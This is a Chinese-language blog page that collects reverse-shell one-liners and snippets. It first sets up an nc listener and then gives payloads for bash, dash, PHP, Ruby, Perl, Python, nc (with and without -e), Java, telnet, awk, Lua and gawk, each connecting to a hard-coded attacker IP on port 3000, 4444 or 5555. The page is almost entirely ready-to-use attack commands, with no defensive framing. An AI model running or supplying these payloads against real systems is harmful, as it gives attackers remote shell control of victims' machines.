欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

反弹shell的姿势汇总

程序员文章站 2022-07-07 19:31:19
...

首先在攻击者机器上监听3000端口

nc -nvlp 3000

bash反弹

bash -i >& /dev/tcp/172.17.230.33/3000 0>&1

dash反弹

dash -i >& /dev/tcp/172.17.230.33/3000 0>&1

PHP反弹

php -r 'exec("/bin/bash -i >& /dev/tcp/172.17.154.109/3000");'
php -r '$sock=fsockopen("172.17.154.109",3000);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby反弹

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("172.17.154.109","3000");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

perl反弹

perl -e 'use Socket;$i="172.17.154.109";$p=3000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python反弹

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.17.230.33',3000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

nc反弹

nc -e /bin/bash 172.17.230.33 3000

不使用-e反弹

mknod /tmp/xm p
/bin/sh 0</tmp/xm |nc 172.17.230.33 3000 1> /tmp/xm

Java反弹

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/172.17.154.109/3000;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

Telnet反弹

攻击者主机上打开两个终端分别执行监听:

nc -lvvp 4444
nc -lvvp 5555
telnet 172.17.154.109 4444 | /bin/bash | telnet 172.17.154.109 5555

监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip
反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。

awk反弹

awk 'BEGIN{s="/inet/tcp/0/172.17.154.109/3000";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'

lua反弹

lua -e "local socket=require('socket');require('os');t=socket.tcp();t:connect('172.17.154.109','3000');os.execute('/bin/sh -i <&3 >&3 2>&3');"

gawk反弹

gawk 'BEGIN{s="/inet/tcp/0/172.17.154.109/3000";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'